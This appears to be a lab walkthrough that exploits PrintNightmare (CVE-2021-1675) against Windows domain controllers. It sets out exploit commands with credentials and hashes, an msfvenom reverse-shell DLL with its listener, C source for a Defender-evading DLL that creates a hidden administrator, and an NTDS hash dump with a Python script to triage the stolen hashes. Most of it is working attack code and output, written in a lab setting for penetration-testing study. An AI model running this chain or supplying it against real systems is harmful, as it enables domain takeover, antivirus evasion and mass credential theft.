# Exploit

### Exploit on vulnerable Windows Server 2019 (Bronx) <a href="#exploit-on-vulnerable-windows-server-2019-winterfell" id="exploit-on-vulnerable-windows-server-2019-winterfell"></a>

* Now run the same exploit against a vulnerable Windows Server 2019 (Bronx), authenticating as the ordinary domain user elena.lopez. No special rights are needed: any authenticated domain account may ask the spooler to install a printer driver, which is what turns PrintNightmare into a one-shot path to SYSTEM.

```
python3 CVE-2021-1675.py north.newyork.local/elena.lopez:'princesa1'@north.newyork.local '\\192.168.56.31\ATTACKERSHARE\nightmare.dll'
```

<figure><img src="/files/pZZ4gQQkUcVmrIdnTIPU" alt=""><figcaption></figcaption></figure>

Before moving on to the other targets, verify that the Print Spooler service is running and that its RPC interfaces are reachable. The exploit drives spoolsv.exe over MS-RPRN, so a host where the service is stopped or disabled cannot be exploited this way.

### Check that the spooler is active

```
crackmapexec smb 192.168.56.10-23 -M spooler
```

<figure><img src="/files/V2oURJZd8Po4Ad8JI3gv" alt=""><figcaption></figcaption></figure>

```
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
```

<figure><img src="/files/udLTWaUm6XzdoDZcUJAc" alt=""><figcaption></figcaption></figure>
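
The `egrep` above relies on impacket's friendly protocol names; keying the check on the interface UUIDs is more robust, and recording the dynamic TCP port the spooler listens on is useful for later. The following is an added example, not code from the original page or from impacket: it parses `rpcdump.py` output and decides whether the two spooler interfaces are registered. The listing embedded below is a constructed, trimmed sample in the layout rpcdump.py prints; the MS-SCMR block is only there as a non-spooler interface for contrast.

```python
#!/usr/bin/env python3
"""Decide from rpcdump.py output whether a host exposes the Print Spooler RPC
interfaces that PrintNightmare drives: MS-RPRN and its asynchronous sibling MS-PAR.

Added example, not part of the original page or of impacket. SAMPLE_RPCDUMP is a
constructed, trimmed listing in rpcdump.py's layout, not a capture from the lab.
"""
import re
import sys
from typing import Dict, List

# Interface UUIDs registered by spoolsv.exe (from the MS-RPRN / MS-PAR specifications).
MS_RPRN = "12345678-1234-abcd-ef00-0123456789ab"  # Print System Remote Protocol
MS_PAR = "76f03f96-cdfd-d44d-a42f-d4a75d5e4f9b"   # Print System Asynchronous Remote Protocol

# Constructed sample: one block per interface, as rpcdump.py prints them.
SAMPLE_RPCDUMP = """\
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:192.168.56.10[49668]

Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:192.168.56.10[49673]
          ncalrpc:[LRPC-8f1e2c9d4b]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Provider: spoolsv.exe 
UUID    : 76F03F96-CDFD-D44D-A42F-D4A75D5E4F9B v1.0 
Bindings: 
          ncacn_ip_tcp:192.168.56.10[49673]
          ncalrpc:[LRPC-8f1e2c9d4b]
"""

BINDING_RE = re.compile(r"^(ncacn_\w+|ncalrpc):")
UUID_RE = re.compile(r"([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\s+v([\d.]+)")


def parse_rpcdump(text: str) -> Dict[str, dict]:
    """Map each interface UUID (lower-case) to its protocol, provider, version and bindings."""
    entries: Dict[str, dict] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Protocol:"):
            current = {"protocol": line.split(":", 1)[1].strip(),
                       "provider": None, "version": None, "bindings": []}
        elif current is None:
            continue
        elif line.startswith("Provider:"):
            current["provider"] = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            m = UUID_RE.search(line)
            if m:
                current["version"] = m.group(2)
                entries[m.group(1).lower()] = current
        elif BINDING_RE.match(line):
            current["bindings"].append(line)
    return entries


def tcp_ports(bindings: List[str]) -> List[int]:
    """Extract the dynamic TCP ports from ncacn_ip_tcp bindings."""
    ports = set()
    for b in bindings:
        m = re.match(r"ncacn_ip_tcp:[^\[]*\[(\d+)\]", b)
        if m:
            ports.add(int(m.group(1)))
    return sorted(ports)


def spooler_exposure(text: str) -> dict:
    """Report which spooler interfaces are registered and where they listen."""
    entries = parse_rpcdump(text)
    report = {}
    for name, uuid in (("MS-RPRN", MS_RPRN), ("MS-PAR", MS_PAR)):
        entry = entries.get(uuid)
        report[name] = {
            "registered": entry is not None,
            "provider": entry["provider"] if entry else None,
            "tcp_ports": tcp_ports(entry["bindings"]) if entry else [],
        }
    # Either interface registered means spoolsv.exe is up and a PrintNightmare attempt
    # is worth making; neither means no spooler interface is known to the endpoint mapper.
    report["spooler_running"] = any(report[n]["registered"] for n in ("MS-RPRN", "MS-PAR"))
    return report


if __name__ == "__main__":
    # Usage: rpcdump.py @192.168.56.10 | python3 spooler_check.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RPCDUMP
    result = spooler_exposure(data)
    for iface in ("MS-RPRN", "MS-PAR"):
        info = result[iface]
        state = "registered" if info["registered"] else "absent"
        print(f"{iface}: {state} provider={info['provider']} tcp={info['tcp_ports']}")
    print("spooler running:", result["spooler_running"])
    sys.exit(0 if result["spooler_running"] else 1)
```

Pipe real rpcdump.py output into the script; the exit code (0 when a spooler interface is registered) makes it easy to loop over a target range from a shell.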

### Host the DLL on an SMB share

The spooler on the target fetches the driver DLL from a UNC path we control, so serve the directory that will hold the payload with impacket's smbserver (the share name `smb` is the one referenced in the UNC paths below):

```
sudo smbserver.py -smb2support "smb" /home/jefe/smb
```

<figure><img src="/files/GkJH0kdOIpaenxtOTMlh" alt=""><figcaption></figcaption></figure>

### Create a reverse-shell DLL and place it in the SMB directory

```
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
```

<figure><img src="/files/W91MxlV6zd8fiSfCriRn" alt=""><figcaption></figcaption></figure>

### Setup the listener

```
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
```

<figure><img src="/files/fACOxj1fhQK8naaPm5WK" alt=""><figcaption></figcaption></figure>

```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\pnightmare2.dll'
```

### No shell: the DLL gets caught by Defender

The msfvenom DLL is flagged as soon as spoolsv.exe loads it, so the listener never receives a connection.

<figure><img src="/files/NLioTB591nogVmRbAAv6" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6Z82MbJtVTKOm4J1l4VI" alt=""><figcaption></figcaption></figure>

### Let's craft a new DLL

* Replace the msfvenom payload with different code: a DLL that creates a local administrator through the documented Win32 `NetUserAdd` / `NetLocalGroupAddMembers` APIs (source: <https://github.com/newsoft/adduser>).
* Good to know: after a few failed attempts the Print Spooler service ends up stopped by Defender, and no further exploitation is possible until someone restarts the server or the spooler service, so test a payload against Defender before spending attempts on the target.

```
/*
 * ADDUSER.C: creating a Windows user programmatically.
 * Source: https://github.com/newsoft/adduser
 *
 * When delivered through PrintNightmare this DLL is loaded by spoolsv.exe,
 * which runs as SYSTEM, so DllMain has the privilege needed to create the
 * account. The _tprintf output is only visible when the same binary is run
 * from a console or via rundll32; inside the spooler it goes nowhere.
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>


DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    BYTE Sid[256];
    DWORD cbSid = sizeof(Sid);                          // size in bytes; far larger than any real SID

    TCHAR Domain[256];
    DWORD cchDomain = sizeof(Domain) / sizeof(TCHAR);   // LookupAccountName wants a TCHAR count

    // Create the user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name        = _T("yournightmare");             // username
    ud.usri1_password    = _T("Jusbrowsing123!");           // password (must satisfy the password policy)
    ud.usri1_priv        = USER_PRIV_USER;                  // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags       = UF_SCRIPT | UF_NORMAL_ACCOUNT;   // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,             // local server (on a domain controller this creates a domain user)
        1,                // information level
        (LPBYTE)&ud,
        NULL              // index of the offending field on error (not needed)
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %lu 0x%08lx\r\n"), rc, rc);
        return rc;
    }

    _tprintf(_T("NetUserAdd OK\r\n"));

    // Resolve the new account's SID
    b = LookupAccountName(
        NULL,            // local server
        ud.usri1_name,   // account name
        Sid,             // SID
        &cbSid,          // SID size
        Domain,          // Domain
        &cchDomain,      // Domain size (in TCHARs)
        &snu             // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %lu 0x%08lx\r\n"), dw, dw);
        return dw;
    }

    // Add the user to the "Administrators" local group (the built-in
    // Administrators group when running on a domain controller)
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                    // local server
        _T("Administrators"),
        0,                       // information level
        (LPBYTE)&gd,
        1                        // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %lu 0x%08lx\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point: the spooler loading the "driver" triggers DLL_PROCESS_ATTACH.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point: rundll32 adduser.dll,CreateAdminUser
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    (void)hwnd; (void)hinst; (void)lpszCmdLine; (void)nCmdShow;
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point (used when the same source is built as an .exe).
int main(void)
{
    return (int)CreateAdminUserInternal();
}
```

* This payload is not flagged by Defender: it carries no shellcode, only a handful of documented Win32 calls. Because spoolsv.exe runs as SYSTEM, the account is created and added to Administrators without any further privilege. On a domain controller such as baltimore.maryland.local there is no local SAM, so `NetUserAdd` creates a domain user and `Administrators` is the DC's built-in Administrators group, which is why yournightmare appears in the NTDS dump below with a fresh RID.

### Compile

```
sudo apt-get install gcc-mingw-w64
wget https://raw.githubusercontent.com/newsoft/adduser/master/adduser.c
```

```
# cross-compile to a DLL with mingw; netapi32 provides NetUserAdd / NetLocalGroupAddMembers
x86_64-w64-mingw32-gcc -shared -o pnightmare2.dll adduser.c -lnetapi32
```

* Copy the compiled DLL into the shared directory and relaunch the exploit, pointing the UNC path at the file actually present on the share (the name in the path must match the file you placed there):

```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\yournightmare.dll'
```

<figure><img src="/files/l9NXPtkKYxqRQdZK9dM7" alt=""><figcaption></figcaption></figure>

### Dump the NTDS with the new administrator account

The account created by the DLL is a member of Administrators on the domain controller, so it can pull every hash out of NTDS.dit:

```
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
SMB         maryland.local  445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         maryland.local  445    BALTIMORE        [+] maryland.local\yournightmare:Jusbrowsing123! (Pwn3d!)
SMB         maryland.local  445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         maryland.local  445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         maryland.local  445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
SMB         maryland.local  445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         maryland.local  445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
SMB         maryland.local  445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         maryland.local  445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         maryland.local  445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         maryland.local  445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         maryland.local  445    BALTIMORE        pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB         maryland.local  445    BALTIMORE        yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
SMB         maryland.local  445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SMB         maryland.local  445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
SMB         maryland.local  445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
SMB         maryland.local  445    BALTIMORE        [+] Dumped 15 NTDS hashes to /home/jefe/.cme/logs/BALTIMORE_maryland.local_2023-03-08_223947.ntds of which 12 were added to the database
```

<figure><img src="/files/O86oMtHHrTRebCBKa3mc" alt=""><figcaption></figcaption></figure>
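
Before the dump goes to a cracking rig it is worth a quick triage: blank passwords, shared passwords, the krbtgt secret, machine accounts, and the accounts we ourselves created and now owe a cleanup for. The following is an added example, not code from the original page or from crackmapexec. Its input is the hash list printed above with the `SMB ... BALTIMORE` column prefix removed; `created_by_us` names the two accounts this page's DLL created so that the cleanup step below has a list of RIDs to remove.

```python
#!/usr/bin/env python3
"""Triage an NTDS dump in pwdump format (user:rid:lm:nt:::), as printed by
crackmapexec --ntds or secretsdump.py, before cracking or pass-the-hash.

Added example, not part of the original page or of crackmapexec. NTDS_DUMP is
the hash list from the page's dump with the 'SMB ... BALTIMORE' prefix removed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

NTDS_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")


def parse_pwdump(text: str) -> List[Account]:
    """Parse user:rid:lm:nt[:...] lines; skip anything that is not a hash line."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
            continue
        accounts.append(Account(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts


def triage(accounts: List[Account], created_by_us: Set[str] = frozenset()) -> dict:
    """Sort the dump into what matters after a domain compromise."""
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for a in accounts:
        if not a.is_machine:  # machine passwords are random; reuse among them is noise
            by_nt[a.nt].append(a.user)
    return {
        # Empty password: usable without cracking if the account is enabled.
        "blank_password": sorted(a.user for a in accounts if a.nt == EMPTY_NT),
        # Same NT hash on several users = shared password; crack once, log in everywhere.
        "password_reuse": {nt: sorted(u) for nt, u in by_nt.items()
                           if len(u) > 1 and nt != EMPTY_NT},
        # krbtgt leaked: tickets can be forged until the account is rotated twice.
        "krbtgt_exposed": any(a.rid == 502 for a in accounts),
        # Machine accounts: the DC's own hash is DCSync / silver-ticket material.
        "machine_accounts": sorted(a.user for a in accounts if a.is_machine),
        # Any LM hash still stored would be trivially crackable; expected empty.
        "lm_hashes_present": sorted(a.user for a in accounts if a.lm != EMPTY_LM),
        # Accounts we created and must remove during cleanup, with their RIDs.
        "cleanup": sorted((a.user, a.rid) for a in accounts if a.user in created_by_us),
        # RIDs are allocated sequentially, so the highest ones are the newest objects.
        "newest": [a.user for a in sorted(accounts, key=lambda a: a.rid, reverse=True)[:3]],
    }


if __name__ == "__main__":
    report = triage(parse_pwdump(NTDS_DUMP), created_by_us={"pnightmare2", "yournightmare"})
    for key, value in report.items():
        print(f"{key:20} {value}")
```

Point `parse_pwdump` at the `.ntds` file crackmapexec writes under `~/.cme/logs/` to run the same triage on a real dump; the `newest` view is also a cheap way to spot accounts an earlier attempt (or another attacker) left behind.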

#### Cleanup <a href="#cleanup" id="cleanup"></a>

```
xfreerdp /u:yournightmare /p:Jusbrowsing123! /v:192.168.56.12 /size:80%  /cert-ignore
```

* After exploitation the uploaded DLLs are left behind in the spooler's driver directory: `C:\Windows\System32\spool\drivers\x64\3`

<figure><img src="/files/GxXaGKHyXmz5OieYOgLX" alt=""><figcaption></figcaption></figure>

* Earlier copies are also kept by the spooler under: `C:\Windows\System32\spool\drivers\x64\3\Old\{id}\`

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/traces_old.png" alt=""><figcaption></figcaption></figure>

* Don't forget to clean up: delete the DLLs from both locations and remove the accounts the payload created (pnightmare2 and yournightmare in the dump above). Deleting files does not erase Defender's detection history or the spooler's own record of the driver install in the Microsoft-Windows-PrintService/Operational log (Event ID 316, when that log is enabled), so assume a blue team can still reconstruct what happened.
